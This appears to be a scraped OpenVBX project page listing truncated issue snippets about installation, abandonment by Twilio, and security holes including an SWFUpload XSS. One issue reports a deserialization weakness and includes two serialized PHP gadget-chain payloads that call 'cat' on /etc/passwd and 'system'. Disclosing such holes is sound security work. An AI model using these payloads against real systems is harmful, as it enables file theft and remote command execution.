OpenVBX
OpenVBX copied to clipboard
OpenVBX is a web-based open source phone system for business.
How do I make the phone numbers in sequence 1 to 1000
Due to the lack of responses on issues and a recent email from Twilio it appears that they have completely abandoned OpenVBX. Does anyone else know different?
hi I just got a new greeting & voicemails and I want to upload them to the open VBX for the call flow. right now I have the existing greeting...
I just downloaded the installer, then access the installation page. Fixed all unmet requirement, but can't seem to figure out this one. MySQL is installed just fine on my DigitalOcean...
Integrated Twilio JS v1.4 according to Twilio migration guide (https://www.twilio.com/docs/api/client/twilio-client-javascript-sdk-11-12-migration-guide) Twilio.Device.presence functionality is not currently supported in 1.4. But that is not required to make or receive calls to and...
Upgrading swfupload.swf to mitigate XSS vulnerability filed in https://github.com/twilio/OpenVBX/issues/436
1.)function sess_destroy() 2.)function _set_cookie($cookie_data = NULL) https://github.com/twilio/OpenVBX/blob/7ed912adfc80aa7c5294cc47ebefb11b91ca6c6f/system/libraries/Session.php Both make calls to a serialize function that appears controllable with a payload like this attack_one = """O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"*memcached";O:17:"CodeIgniter\Model":5:{s:10:"*builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"*primaryKey";N;s:15:"*beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"*validationRules";a:1:{s:2:"id";a:1:{s:5:"rules";a:1:{i:0;s:3:"cat";}}}s:13:"*validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"*ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:11:"/etc/passwd";}}""" attack_two = """O:39:"CodeIgniter\Cache\Handlers\RedisHandler":1:{s:8:"*redis";O:45:"CodeIgniter\Session\Handlers\MemcachedHandler":2:{s:12:"*memcached";O:17:"CodeIgniter\Model":5:{s:10:"*builder";O:32:"CodeIgniter\Database\BaseBuilder":0:{}s:13:"*primaryKey";N;s:15:"*beforeDelete";a:1:{i:0;s:8:"validate";}s:18:"*validationRules";a:1:{s:2:"id";a:1:{s:5:"rules";a:1:{i:0;s:6:"system";}}}s:13:"*validation";O:33:"CodeIgniter\Validation\Validation":1:{s:15:"*ruleSetFiles";a:1:{i:0;s:5:"finfo";}}}s:10:"*lockKey";s:2:"id";}}""" not exact...
We have had problems with not being able to log into our openVBX to make edits. When logging in we receive an error message or few and unable to proceed....
Hi, OpenVBX is using an outdated version of [SWFUpload](https://github.com/twilio/OpenVBX/blob/master/assets/j/swfupload/swfupload.swf) that is vulnerable to Flash-based Cross-Site Scripting vulnerability (CVE-2012-3414). It is highly advised upgrading to the latest version to mitigate the...
v1.2.20 r79 mac OS Sierra 10.12.5 Chrome 59.0.3071.115 (Official Build) (64-bit) running on Dreamhost When I load the inbox and click the 'play' button, nothing happens. Debug console shows: ```...